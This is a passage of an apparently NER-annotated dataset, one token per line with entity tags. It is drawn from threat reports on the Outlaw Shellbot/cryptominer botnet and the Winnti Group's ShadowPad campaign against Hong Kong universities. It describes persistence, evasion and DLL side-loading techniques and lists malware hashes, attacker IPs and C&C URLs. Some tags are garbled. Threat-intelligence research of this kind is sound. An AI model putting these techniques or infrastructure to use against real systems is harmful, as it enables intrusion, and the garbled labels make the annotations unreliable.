using O
simple O
PHP-based O
web O
shells O
were O
also O
used O
to O
attack O
systems O
with O
weak O
SSH S-PROT
and O
Telnet S-PROT
credentials O
. O

While O
no O
phishing- O
or O
social O
engineering-initiated O
routines O
were O
observed O
in O
this O
campaign O
, O
we O
found O
multiple O
attacks O
over O
the O
network O
that O
are O
considered O
“ O
loud. O
” O
These O
involved O
large-scale O
scanning O
operations O
of O
IP O
ranges O
intentionally O
launched O
from O
the O
command B-TOOL
and I-TOOL
control E-TOOL
( O
C&C O
) O
server O
. O

The O
honeynet O
graphs O
, O
which O
show O
activity O
peaks O
associated O
with O
specific O
actions O
, O
also O
suggest O
that O
the O
scans O
were O
timed O
. O

We O
also O
considered O
the O
move O
as O
an O
obfuscation O
technique O
, O
as O
it O
was O
mixed O
with O
a O
lot O
of O
script O
kiddie O
activities O
that O
can O
easily O
be O
mistaken O
for O
grey O
noise O
online O
. O

The O
attackers O
could O
hide O
their O
activities O
if O
they O
noted O
the O
business O
hours O
of O
the O
intended O
targets O
and O
performed O
the O
actions O
coinciding O
with O
said O
times O
. O

From O
the O
sample O
we O
analyzed O
, O
attacks O
started O
from O
one O
virtual B-TOOL
private I-TOOL
server E-TOOL
( O
VPS S-TOOL
) O
that O
searches O
for O
a O
vulnerable O
machine O
to O
compromise O
( O
previous O
techniques O
used O
malicious O
URLs O
or O
infecting O
legitimate O
websites O
for O
bot O
propagation O
) O
. O

Once O
infected O
, O
the O
C&C S-TOOL
commands O
for O
the O
infected O
system O
launches O
a O
loud O
scanning O
activity O
and O
spreads O
the O
botnet O
by O
sending O
a O
“ O
whole O
kit O
” O
of O
binary O
files O
at O
once O
with O
naming O
conventions O
same O
as O
the O
ones O
already O
in O
the O
targeted O
host O
, O
likely O
banking O
on O
breaking O
through O
via O
“ O
security O
through O
obscurity. O
” O
They O
attempted O
to O
evade O
traffic O
inspection O
by O
encoding O
the O
code O
for O
the O
scanner O
with O
base-64 S-ENCR
. O

The O
zombie O
host O
initiates O
the O
scan O
— O
another O
routine O
from O
previous O
campaigns O
— O
but O
updated O
with O
a O
larger O
set O
of O
parameters O
and O
programmed O
to O
run O
in O
the O
background O
. O

The O
kit O
we O
found O
is O
in O
tgz O
format O
, O
though O
we O
have O
observed O
some O
samples O
disguised O
as O
png O
or O
jpg O
. O

While O
previous O
routines O
took O
advantage O
of O
competing O
miners O
’ O
activities O
and O
unrelated O
components O
to O
hijack O
the O
profit O
, O
the O
latest O
version O
of O
the O
code O
attempts O
to O
remove O
all O
related O
files O
and O
codes O
from O
previous O
infections O
( O
including O
their O
own O
to O
make O
sure O
the O
running O
components O
are O
updated O
, O
as O
well O
as O
those O
from O
other O
cybercriminals O
to O
maximize O
the O
resources O
of O
the O
zombie O
host O
) O
and O
creates O
a O
new O
working O
directory O
/tmp/.X19-unix O
to O
move O
the O
kit O
and O
extract O
the O
files O
. O

The O
tsm O
binary O
then O
runs O
in O
the O
background O
, O
forwarding O
a O
series O
of O
error O
messages O
to O
/dev/null O
to O
keep O
the O
code O
running O
, O
ensuring O
the O
continuous O
execution O
of O
the O
code O
referenced O
with O
a O
set O
of O
parameters O
/tmp/up.txt O
. O

The O
script O
then O
waits O
20 O
minutes O
before O
it O
runs O
the O
wrapper O
script O
initall S-FILE
: O

2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a S-SHA2
install S-FILE
. O

Another O
variant O
executes O
a O
set O
of O
commands O
once O
a O
system O
is O
successfully O
compromised O
. O

Most O
of O
these O
commands O
are O
related O
to O
gathering O
information O
from O
the O
infected O
machine O
( O
number O
of O
CPU O
cores O
, O
users O
, O
scheduled O
tasks O
, O
running O
processes O
, O
OS O
installed O
, O
and O
CPU O
and O
memory O
information O
) O
via O
the O
dota3 S-TOOL
payload O
, O
as O
well O
as O
changing O
the O
password O
to O
a O
random O
string O
also O
stored O
in O
/tmp/up.txt O
. O

In O
a O
previous O
execution O
( O
published O
in O
June B-TIME
2019 E-TIME
) O
, O
we O
observed O
that O
dota2 S-TOOL
had O
its O
own O
folder O
but O
it O
was O
hardly O
executed O
, O
indicating O
that O
this O
version O
is O
the O
updated O
iteration O
. O

Running O
the O
script O
removes O
the O
remaining O
files O
and O
scripts O
from O
previous O
attacks O
, O
keeping O
a O
low O
profile O
to O
evade O
detection O
. O

If O
the O
system O
has O
been O
previously O
infected O
with O
a O
cryptominer O
, O
it O
also O
attempts O
to O
kill O
the O
running O
miner O
and O
all O
its O
related O
activities O
. O

Based O
on O
a O
bashtemp O
directory O
of O
the O
latest O
sample O
we O
found O
, O
there O
are O
other O
compiled O
ELF S-TOOL
scripts O
, O
named O
init S-FILE
and O
init2 S-FILE
, O
that O
loops O
the O
kit O
to O
keep O
running O
: O

0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6 O

 S-SHA2init S-FILE
. O
93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494 O

 S-SHA2init2 S-FILE
. O

Both O
init S-FILE
and O
init2 S-FILE
scripts O
make O
sure O
all O
other O
running O
mining O
services O
are O
killed O
, O
and O
that O
all O
the O
files O
in O
the O
working O
directory O
are O
executed O
by O
giving O
777 O
permissions O
. O

We O
also O
found O
the O
init0 S-FILE
script O
running O
; O
the O
script O
cleans O
out O
all O
miners O
regardless O
of O
its O
origin O
. O

It O
then O
resets O
cron O
and O
removes O
possible O
cache O
files O
from O
other O
programs O
, O
starts O
scripts O
and O
binaries O
a S-FILE
, O
init0 S-FILE
, O
and O
start O
, O
and O
sets O
the O
persistence O
by O
modifying O
the O
crontab O
. O

The O
a O
binary O
is O
a O
script B-TOOL
wrapper E-TOOL
to O
start O
run O
, O
a O
Perl-obfuscated B-TOOL
script E-TOOL
for O
installation O
of O
a O
Shellbot S-MAL
to O
gain O
control O
of O
the O
infected O
system O
. O

The O
Shellbot S-MAL
disguises O
itself O
as O
a O
process O
named O
rsync O
, O
commonly O
the O
binary O
seen O
on O
many O
Unix- S-OS
and O
Linux-based B-OS
systems E-OS
to O
automatically O
run O
for O
backup O
and O
synchronization O
. O

This O
allows O
the O
malicious O
activity O
to O
evade O
detection O
. O

The O
Shellbot S-MAL
script O
is O
added O
to O
run O
after O
the O
victim O
’s O
system O
reboots O
, O
and O
scripts O
/a/upd O
, O
/b/sync/ O
, O
and O
/c/aptitude/ O
are O
added O
to O
the O
crontab O
. O

However O
, O
while O
we O
observed O
the O
presence O
of O
the O
codes O
, O
the O
functions O
of O
upd O
, O
sync O
and O
aptitude O
were O
disabled O
in O
the O
kits O
’ O
latest O
version O
. O

It O
remains O
unclear O
whether O
these O
are O
leftover O
code O
from O
the O
previous O
versions O
or O
their O
particular O
purposes O
were O
served O
. O

Shellbot S-MAL
is O
also O
used O
to O
control O
the O
botnet S-MAL
, O
with O
a O
command O
that O
is O
sent O
and O
run O
from O
the O
C&C S-TOOL
to O
determine O
if O
there O
is O
a O
code O
execution O
in O
the O
shell O
, O
the O
hostname O
, O
and O
its O
architecture O
. O

All O
results O
and O
system O
information O
collected O
from O
the O
infected O
system O
are O
stored O
locally O
in O
the O
device O
for O
a O
period O
before O
Outlaw S-APT
retrieves O
them O
via O
the O
C&C S-TOOL
. O

We O
also O
found O
traces O
of O
Android B-TOOL
Package I-TOOL
Kits- E-TOOL
( O
APK- S-TOOL
) O
and O
Android B-TOOL
Debug I-TOOL
Bridge E-TOOL
( O
ADB S-TOOL
)-based O
commands O
that O
enable O
cryptocurrency O
mining O
activities O
in O
Android-based B-TOOL
TVs E-TOOL
. O

Since O
discovering O
the O
operations O
of O
this O
group O
in O
2018 S-TIME
, O
Outlaw S-APT
continues O
to O
use O
scripts O
, O
codes O
, O
and O
commands O
that O
have O
been O
previously O
used O
and O
deployed O
. O

These O
routines O
are O
indicative O
of O
the O
group O
’s O
aim O
to O
get O
quantitative O
returns O
through O
varied O
cybercriminal O
profit O
streams O
. O

This O
was O
also O
reinforced O
by O
their O
naming O
conventions O
, O
wherein O
different O
versions O
are O
simply O
named O
after O
the O
code O
iterations O
, O
following O
a O
specific O
format O
regardless O
of O
the O
actual O
function O
of O
the O
code O
. O

Furthermore O
, O
based O
on O
the O
group O
’s O
use O
of O
dated O
exploits O
as O
vectors O
that O
companies O
would O
have O
likely O
addressed O
with O
monitoring O
and O
regular O
patching O
schedules O
, O
it O
appears O
that O
they O
’re O
going O
after O
enterprises O
who O
have O
yet O
to O
patch O
their O
systems O
, O
as O
well O
as O
companies O
with O
internet-facing O
systems O
with O
weak O
to O
no O
monitoring O
of O
traffic O
and O
activities O
. O

Considering O
the O
amount O
of O
resources O
needed O
to O
deploy O
all O
the O
necessary O
patches O
for O
an O
enterprise O
( O
such O
as O
quality O
testing O
and O
operations O
alignment O
) O
, O
which O
implies O
costly O
downtime O
for O
operations O
and O
the O
hesitation O
to O
update O
all O
systems O
immediately O
, O
Outlaw S-APT
may O
find O
even O
more O
targets O
and O
victims O
for O
their O
updated O
botnets O
every O
time O
there O
is O
a O
patch O
released O
and O
waiting O
to O
be O
downloaded O
. O

Save O
for O
a O
few O
iteration O
updates O
, O
combinations O
from O
previous O
deployments O
, O
and O
using O
the O
routines O
repetitively O
for O
every O
campaign O
, O
we O
found O
very O
little O
changes O
in O
the O
group O
’s O
toolkit O
, O
which O
allowed O
various O
honeypots S-MAL
across O
the O
Eastern B-LOC
European E-LOC
region O
to O
detect O
many O
of O
the O
sent O
binaries O
. O

Meanwhile O
, O
the O
group O
uses O
a O
wide O
range O
of O
IP O
addresses O
as O
input O
for O
scanning O
activities O
that O
are O
grouped O
by O
country O
, O
allowing O
them O
to O
attack O
certain O
regions O
or O
areas O
within O
particular O
periods O
of O
the O
year O
, O
as O
previously O
observed O
. O

We O
think O
the O
group O
has O
likely O
become O
more O
enterprising O
, O
and O
learned O
to O
take O
advantage O
of O
some O
details O
from O
their O
previous O
campaigns O
to O
maximize O
profit O
opportunities O
while O
exerting O
minimal O
effort O
. O

By O
shaping O
the O
attack O
, O
the O
group O
may O
be O
able O
to O
create O
niches O
in O
the O
underground O
, O
catering O
to O
the O
specific O
needs O
of O
their O
customers O
. O

Also O
aware O
of O
the O
existing O
laws O
in O
Europe S-LOC
, O
they O
can O
avoid O
prosecution O
in O
certain O
countries O
as O
long O
as O
they O
avoid O
attacking O
them O
. O

Collection O
of O
results O
and O
data O
from O
scanning O
in O
this O
manner O
might O
be O
easier O
to O
sort O
( O
while O
allowing O
them O
to O
stay O
under O
the O
radar O
) O
, O
as O
compared O
to O
getting O
feedback O
from O
zombie O
bots O
deployed O
around O
the O
world O
simultaneously O
. O

We O
will O
continue O
to O
monitor O
this O
hacking O
group O
’s O
activities O
and O
their O
toolkit O
’s O
developments O
. O

Outlaw S-APT
’s O
attack O
routines O
may O
not O
be O
new O
, O
but O
it O
still O
serves O
as O
a O
reminder O
for O
enterprises O
to O
update O
their O
systems O
regularly O
. O

Legacy O
system O
users O
may O
use O
their O
providers O
’ O
virtual O
patches O
. O

Users O
are O
advised O
to O
close O
unused O
ports O
, O
to O
secure O
ports O
and O
other O
internet-facing O
devices O
that O
are O
regularly O
open O
for O
system O
administrators O
’ O
support O
. O

Users O
can O
also O
adopt O
a O
multilayered O
security O
solution O
that O
can O
protect O
systems O
from O
the O
gateway O
to O
the O
endpoint O
, O
actively O
blocking O
malicious O
URLs O
by O
employing O
filtering O
, O
behavioral O
analysis O
, O
and O
custom O
sandboxing O
. O

Users O
can O
consider O
adopting O
security O
solutions O
that O
can O
defend O
against O
malicious O
bot-related O
activities O
such O
as O
Outlaw S-APT
’s O
through O
a O
cross-generational O
blend O
of O
threat O
defense O
techniques O
. O

Trend B-TOOL
Micro™ I-TOOL
XGen™ E-TOOL
security O
provides O
high-fidelity O
machine O
learning O
that O
can O
secure O
the O
gateway O
and O
endpoints O
, O
and O
protect O
physical O
, O
virtual O
, O
and O
cloud O
workloads O
. O

With O
technologies O
that O
employ O
web/URL O
filtering O
, O
behavioral O
analysis O
, O
and O
custom O
sandboxing O
, O
XGen S-TOOL
security O
offers O
protection O
against O
ever-changing O
threats O
that O
bypass O
traditional O
controls O
and O
exploit O
known O
and O
unknown O
vulnerabilities O
. O

A O
multi-layered O
connected O
network O
defense O
and O
complete O
visibility O
into O
all O
network O
traffic O
, O
in O
addition O
to O
next-generation B-TOOL
intrusion I-TOOL
prevention I-TOOL
system E-TOOL
( O
NGIPS S-TOOL
) O
, O
can O
help O
organizations O
stay O
a O
step O
ahead O
of O
threats O
that O
could O
compromise O
intangible O
assets O
. O

XGen S-SECTEAM
security O
also O
powers O
Trend B-IDTY
Micro E-IDTY
’s O
suite O
of O
security O
solutions O
: O
Hybrid O
Cloud O
Security O
and O
User O
Protection O
. O

Outlaw S-APT
: O
1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa S-SHA2
Cryptocurrency B-TOOL
miner E-TOOL
Trojan.SH.MALXMR.UWEJP S-MAL
. O

Outlaw S-APT
: O
b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d S-SHA2
Shellbot S-MAL
Backdoor.SH.SHELLBOT.AA S-MAL
. O

Outlaw S-APT
: O
620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976 S-SHA2
Tool O
Trojan.Linux.SSHBRUTE.B S-MAL
. O

Outlaw S-APT
: O
fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a S-SHA2
Cryptocurrency B-TOOL
miner E-TOOL
Coinminer.Linux.MALXMR.SMDSL32 S-MAL
. O

Outlaw S-APT
: O
649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 S-SHA2
Cryptocurrency B-TOOL
miner E-TOOL
Coinminer.Linux.MALXMR.SMDSL64 S-MAL
. O

Outlaw S-APT
: O
159.203.141.208 S-IP
. O

Outlaw S-APT
: O
104.236.192.6 S-IP
. O

Outlaw S-APT
: O
45.9.148.129:80 S-IP
Miner B-TOOL
pool E-TOOL
. O

Outlaw S-APT
: O
45.9.148.125:80 S-IP
Miner B-TOOL
pool E-TOOL
. O

Outlaw S-APT
: O
http://www.minpop.com/sk12pack/idents.php S-URL
Command B-TOOL
and I-TOOL
control E-TOOL
. O

Outlaw S-APT
: O
http://www.minpop.com/sk12pack/names.php S-URL
Command B-TOOL
and I-TOOL
control E-TOOL
. O


Winnti B-APT
Group E-APT
targeting O
universities O
in O
Hong B-LOC
Kong E-LOC
. O

In O
November B-TIME
2019 E-TIME
, O
we O
discovered O
a O
new O
campaign O
run O
by O
the O
Winnti B-APT
Group E-APT
against O
two O
Hong B-LOC
Kong E-LOC
universities O
. O

We O
found O
a O
new O
variant O
of O
the O
ShadowPad B-MAL
backdoor E-MAL
, O
the O
group O
’s O
flagship O
backdoor S-MAL
, O
deployed O
using O
a O
new O
launcher O
and O
embedding O
numerous O
modules O
. O

The B-MAL
Winnti I-MAL
malware E-MAL
was O
also O
found O
at O
these O
universities O
a O
few O
weeks O
prior O
to O
ShadowPad S-MAL
. O

The O
Winnti B-APT
Group E-APT
, O
active O
since O
at B-TIME
least I-TIME
2012 E-TIME
, O
is O
responsible O
for O
for O
high-profile O
supply-chain O
attacks O
against O
the O
video O
game O
and O
software O
industries O
leading O
to O
the O
distribution O
of O
trojanized B-MAL
software E-MAL
( O
such O
as O
CCleaner S-TOOL
, O
ASUS B-TOOL
LiveUpdate E-TOOL
and O
multiple O
video O
games O
) O
that O
is O
then O
used O
to O
compromise O
more O
victims O
. O

It O
is O
also O
known O
for O
having O
compromised O
various O
targets O
in O
the O
healthcare O
and O
education O
sectors O
. O

ESET S-IDTY
researchers O
recently O
published O
a O
white O
paper O
updating O
our O
understanding O
of O
the O
arsenal O
of O
the O
Winnti B-APT
Group E-APT
, O
following O
a O
blog O
post O
documenting O
a O
supply-chain O
attack O
targeting O
the O
videogame O
industry O
in O
Asia S-LOC
. O

Additionally O
, O
we O
published O
a O
blog O
post O
on O
a O
new O
backdoor S-MAL
named O
skip-2.0 S-MAL
that O
targets O
Microsoft B-TOOL
SQL I-TOOL
Server E-TOOL
. O

This O
article O
focuses O
on O
the O
technical O
details O
of O
this O
new O
ShadowPad S-MAL
variant O
. O

About O
the O
“ O
Winnti B-APT
Group E-APT
” O
naming O
: O

We O
have O
chosen O
to O
keep O
the O
name O
“ O
Winnti B-APT
Group E-APT
” O
since O
it O
’s O
the O
name O
first O
used O
to O
identify O
it O
, O
in O
2013 S-TIME
, O
by O
Kaspersky S-SECTEAM
. O

Since O
Winnti S-MAL
is O
also O
a O
malware O
family O
, O
we O
always O
write O
“ O
Winnti B-APT
Group E-APT
” O
when O
we O
refer O
to O
the O
malefactors O
behind O
the O
attacks O
. O

Since O
2013 S-TIME
, O
it O
has O
been O
demonstrated O
that O
Winnti S-MAL
is O
only O
one O
of O
the O
many O
malware O
families O
used O
by O
the O
Winnti B-APT
Group E-APT
. O

In O
November B-TIME
2019 E-TIME
, O
ESET S-IDTY
’s O
machine-learning O
engine O
, O
Augur S-TOOL
, O
detected O
a O
malicious O
and O
unique O
sample O
present O
on O
multiple O
computers O
belonging O
to O
two O
Hong B-LOC
Kong E-LOC
universities O
where O
the O
Winnti S-MAL
malware O
had O
already O
been O
found O
at O
the O
end B-TIME
of I-TIME
October E-TIME
. O

The O
suspicious O
sample O
detected O
by O
Augur S-TOOL
is O
actually O
a O
new O
32-bit O
ShadowPad S-MAL
launcher O
. O

Samples O
from O
both O
ShadowPad S-MAL
and O
Winnti S-MAL
found O
at O
these O
universities O
contain O
campaign O
identifiers O
and O
C&C S-TOOL
URLs O
with O
the O
names O
of O
the O
universities O
, O
which O
indicates O
a O
targeted O
attack O
. O

In O
addition O
to O
the O
two O
compromised O
universities O
, O
thanks O
to O
the O
C&C S-TOOL
URL O
format O
used O
by O
the O
attackers O
we O
have O
reasons O
to O
think O
that O
at O
least O
three O
additional O
Hong B-LOC
Kong E-LOC
universities O
may O
have O
been O
compromised O
using O
these O
same O
ShadowPad S-MAL
and O
Winnti S-MAL
variants O
. O

This O
campaign O
of O
the O
Winnti B-APT
Group E-APT
against O
Hong B-LOC
Kong E-LOC
universities O
was O
taking O
place O
in O
the O
context O
of O
Hong B-LOC
Kong E-LOC
facing O
civic O
protests O
that O
started O
in O
June B-TIME
2019 E-TIME
triggered O
by O
an O
extradition O
bill O
. O

Even O
though O
the O
bill O
was O
withdrawn O
in O
October B-TIME
2019 E-TIME
, O
protests O
continued O
, O
demanding O
full O
democracy O
and O
investigation O
of O
the O
Hong B-LOC
Kong E-LOC
police O
. O

These O
protests O
gathered O
hundreds O
of O
thousands O
of O
people O
in O
the O
streets O
with O
large O
support O
from O
students O
of O
Hong B-LOC
Kong E-LOC
universities O
, O
leading O
to O
multiple O
university O
campus O
occupations O
by O
the O
protesters O
. O

We O
have O
contacted O
the O
compromised O
universities O
and O
provided O
the O
necessary O
information O
and O
assistance O
to O
remediate O
the O
compromise O
. O

Unlike O
previous O
ShadowPad S-MAL
variants O
documented O
in O
our O
white O
paper O
on O
the O
arsenal O
of O
the O
Winnti B-APT
Group E-APT
, O
this O
launcher O
is O
not O
obfuscated O
using O
VMProtect S-TOOL
. O

Furthermore O
, O
the O
encrypted O
payload O
is O
neither O
embedded O
in O
the O
overlay O
nor O
located O
in O
a O
COM1:NULL.dat O
alternate O
data O
stream O
. O

And O
the O
usual O
RC5 S-ENCR
encryption O
with O
a O
key O
derived O
from O
the O
volume O
ID O
of O
the O
system O
drive O
of O
the O
victim O
machine O
( O
as O
seen O
in O
the O
PortReuse B-MAL
backdoor E-MAL
, O
skip-2.0 S-MAL
and O
some O
ShadowPad S-MAL
variants O
) O
is O
not O
present O
either O
. O

In O
this O
case O
, O
the O
launcher O
is O
much O
simpler O
. O

The O
launcher O
is O
a O
32-bit O
DLL S-TOOL
named O
hpqhvsei.dll S-FILE
, O
which O
is O
the O
name O
of O
a O
legitimate O
DLL S-TOOL
loaded O
by O
hpqhvind.exe S-FILE
. O

This O
executable O
is O
from O
HP S-IDTY
and O
is O
usually O
installed O
with O
their O
printing O
and O
scanning O
software O
called O
“ O
HP B-TOOL
Digital I-TOOL
Imaging E-TOOL
” O
. O

In O
this O
case O
the O
legitimate O
hpqhvind.exe S-FILE
was O
dropped O
by O
the O
attackers O
, O
along O
with O
their O
malicious O
hpqhvsei.dll S-FILE
, O
in O
C:\Windows\Temp O
. O

Although O
we O
do O
not O
have O
the O
component O
that O
dropped O
and O
executed O
this O
launcher O
, O
the O
presence O
of O
these O
files O
leads O
us O
to O
think O
that O
the O
initial O
execution O
of O
this O
launcher O
is O
done O
through O
DLL B-TOOL
side-l S-TOOLoading E-TOOL
. O

When O
the O
malicious O
DLL S-TOOL
is O
loaded O
at O
hpqhvind.exe S-FILE
startup O
, O
its O
DLLMain O
function O
is O
called O
that O
will O
check O
its O
parent O
process O
for O
the O
following O
sequence O
of O
bytes O
at O
offset O
0x10BA O
. O

In O
the O
case O
where O
the O
parent O
process O
is O
hpqhvind.exe S-FILE
, O
this O
sequence O
of O
bytes O
is O
present O
at O
this O
exact O
location O
and O
the O
malicious O
DLL S-TOOL
will O
proceed O
to O
patch O
the O
parent O
process O
in O
memory O
. O

It O
replaces O
the O
original O
instructions O
at O
0x10BA O
with O
an O
unconditional O
jump O
( O
jmp O
– O
0xE9 O
) O
to O
the O
address O
of O
the O
function O
from O
hpqhvsei.dll S-FILE
that O
decrypts O
and O
executes O
the O
encrypted O
payload O
embedded O
in O
the O
launcher O
. O

The O
decompiled O
function O
responsible O
for O
patching O
the O
parent O
process O
. O

In O
case O
hpqhvsei.dll S-FILE
is O
loaded O
by O
a O
different O
process O
than O
hpqhvind.exe S-FILE
, O
the O
malicious O
code O
will O
not O
be O
decrypted O
and O
executed O
. O

The O
difference O
between O
the O
original O
and O
patched O
hpqhvind.exe S-FILE
. O

The O
part O
of O
the O
code O
that O
is O
patched O
is O
located O
at O
the O
very O
beginning O
of O
the O
main O
function O
of O
hpqhvind.exe S-FILE
. O

The O
patched O
code O
is O
located O
right O
after O
the O
load O
of O
hpqhvsei.dll S-FILE
. O

This O
means O
that O
the O
function O
responsible O
for O
decrypting O
and O
executing O
the O
payload O
is O
executed O
directly O
after O
the O
load O
of O
the O
malicious O
DLL S-TOOL
. O

The O
encrypted O
payload O
is O
located O
in O
the O
.rdata O
section O
of O
hpqhvsei.dll S-FILE
and O
the O
decryption O
algorithm O
is O
an O
XOR S-ENCR
loop O
where O
the O
XOR S-ENCR
key O
is O
updated O
at O
each O
iteration O
. O

The O
decrypted O
payload O
is O
the O
usual O
shellcode S-TOOL
responsible O
for O
ShadowPad S-MAL
initialization O
( O
obfuscated O
using O
fake O
conditional O
jumps O
to O
hinder O
disassembly O
) O
. O

After O
having O
been O
decrypted O
, O
ShadowPad S-MAL
’s O
shellcode S-TOOL
is O
executed O
. O

It O
will O
first O
achieve O
persistence O
on O
the O
system O
by O
writing O
the O
in-memory O
patched O
parent O
process O
to O
disk O
to O
a O
path O
specified O
in O
the O
configuration O
string O
pool O
. O

In O
the O
case O
we O
examined O
, O
the O
path O
was O
C:\ProgramData\DRM\CLR\CLR.exe S-FILE
. O

It O
then O
creates O
a O
service O
named O
clr_optimization_v4.0.30229_32 O
, O
which O
is O
responsible O
for O
executing O
CLR.exe S-FILE
. O

To O
avoid O
suspicion O
, O
this O
service O
name O
, O
as O
well O
as O
the O
executable O
name O
, O
were O
chosen O
to O
look O
similar O
to O
the O
name O
of O
a O
Microsoft B-TOOL
.NET I-TOOL
optimiza S-IDTYtion I-TOOL
Service E-TOOL
. O

The O
numbering O
on O
each O
arrow O
corresponds O
to O
the O
chronological O
sequence O
of O
events O
. O

ShadowPad S-MAL
is O
a O
multimodular O
backdoor S-MAL
where O
the O
modules O
are O
referenced O
from O
the O
Root O
module O
with O
a O
circular O
list O
from O
which O
one O
can O
extract O
the O
module O
address O
, O
a O
UNIX S-OS
timestamp O
( O
probably O
embedded O
automatically O
during O
the O
module O
’s O
compilation O
process O
) O
and O
a O
module O
identifier O
. O

From O
the O
module O
itself O
we O
can O
also O
extract O
the O
name O
the O
developer O
gave O
to O
the O
module O
. O

This O
version O
embeds O
the O
17 O
modules O
listed O
in O
the O
following O
table O
: O

100 O
Root O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:08:27 I-TIME
PM I-TIME
UTC E-TIME
Initial O
shellcode O
. O
101 O
Plugins O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:07:02 I-TIME
PM I-TIME
UTC E-TIME
Provides O
API O
for O
the O
other O
modules O
; O
loads O
modules O
. O
102 O
Config O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:07:09 I-TIME
PM I-TIME
UTC E-TIME
Handles B-FILE
encrypted I-FILE
configuration I-FILE
string I-FILE
pool E-FILE
. O
103 O
Install O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:07:46 I-TIME
PM I-TIME
UTC E-TIME
Achieves O
persistence O
. O
104 O
Online O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:07:17 I-TIME
PM I-TIME
UTC E-TIME
Overall O
communications O
with O
the O
C&C S-TOOL
server O
. O
106 O
ImpUser O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:07:24 I-TIME
PM I-TIME
UTC E-TIME
User O
impersonation O
via O
token O
duplication O
. O
200 O
TCP S-PROT
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:01:01 I-TIME
PM I-TIME
UTC E-TIME
TCP S-PROT
communications O
. O
202 O
HTTPS O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:01:15 I-TIME
PM I-TIME
UTC E-TIME
HTTPS S-PROT
communications O
. O
207 O
Pipe O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:01:35 I-TIME
PM I-TIME
UTC E-TIME
Handles O
named O
pipes O
. O
300 O
Disk O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:02:29 I-TIME
PM I-TIME
UTC E-TIME
File O
system O
operations O
. O
301 O
Process O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:02:36 I-TIME
PM I-TIME
UTC E-TIME
Process O
handling O
. O
302 O
Servcie O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:02:45 I-TIME
PM I-TIME
UTC E-TIME
Service O
handling O
. O
303 O
Register O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:02:52 I-TIME
PM I-TIME
UTC E-TIME
Registry O
operations O
. O
304 O
Shell O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:03:00 I-TIME
PM I-TIME
UTC E-TIME
Command O
line O
operations O
. O
306 O
Keylogger O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:03:16 I-TIME
PM I-TIME
UTC E-TIME
Keylogging O
to O
file O
system O
. O
307 O
Screen O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:03:25 I-TIME
PM I-TIME
UTC E-TIME
Screenshot O
capture O
. O
317 O
RecentFiles O
Thu B-TIME
24 I-TIME
Oct I-TIME
2019 I-TIME
12:04:44 I-TIME
PM I-TIME
UTC E-TIME
Lists O
recently O
accessed O
files O
. O

These O
modules O
, O
except O
for O
RecentFiles O
, O
have O
already O
been O
mentioned O
by O
Kaspersky S-SECTEAM
and O
Avast S-SECTEAM
. O

Notice O
the O
“ O
Servcie O
” O
typo O
. O

As O
usual O
, O
all O
the O
module O
timestamps O
are O
spread O
over O
a O
short O
time O
range O
, O
which O
could O
suggest O
the O
use O
of O
a O
build O
framework O
to O
compile O
these O
modules O
. O

This O
also O
suggests O
that O
these O
modules O
were O
built O
a O
few O
hours O
before O
the O
launcher O
itself O
, O
whose O
compilation O
timestamp O
is O
Thu B-TIME
Oct I-TIME
24 I-TIME
14:10:32 I-TIME
2019 E-TIME
. O

Since O
this O
compilation O
timestamp O
dates O
back O
two O
weeks O
before O
this O
campaign O
, O
it O
’s O
likely O
that O
it O
has O
n’t O
been O
tampered O
with O
by O
the O
attackers O
. O

One O
might O
also O
note O
that O
the O
number O
of O
modules O
embedded O
in O
this O
variant O
is O
much O
higher O
( O
17 O
) O
than O
the O
number O
of O
modules O
embedded O
in O
the O
variants O
previously O
documented O
in O
our O
white O
paper O
( O
8 O
to O
10 O
modules O
) O
. O

By O
default O
, O
every O
keystroke O
is O
recorded O
using O
the O
Keylogger O
module O
( O
306, O
previously O
documented O
by O
Avast S-SECTEAM
) O
and O
saved O
to O
disk O
in O
the O
file O
%APPDATA%\PAGM\OEY\XWWEYG\WAOUE S-FILE
. O

The O
log O
file O
is O
encrypted O
using O
the O
same O
algorithm O
as O
the O
one O
used O
to O
encrypt O
static O
strings O
from O
the O
module O
. O

Using O
this O
module O
by O
default O
indicates O
that O
the O
attackers O
are O
interested O
in O
stealing O
information O
from O
the O
victims O
’ O
machines O
. O

In O
contrast O
, O
the O
variants O
we O
described O
in O
our O
white O
paper O
did O
n’t O
even O
have O
that O
module O
embedded O
. O

As O
with O
previous O
ShadowPad S-MAL
variants O
, O
the O
Config O
module O
( O
102 O
) O
contains O
an O
encrypted O
string O
pool O
that O
can O
be O
accessed O
from O
any O
other O
module O
. O

The O
string O
pool O
is O
never O
stored O
entirely O
decrypted O
in O
memory O
; O
the O
field O
of O
interest O
is O
decrypted O
when O
needed O
and O
then O
immediately O
freed O
( O
thus O
quickly O
unavailable O
) O
. O

The O
configuration O
size O
is O
2180 O
bytes O
and O
the O
encrypted O
strings O
are O
located O
at O
offset O
0x84 O
. O

The O
algorithm O
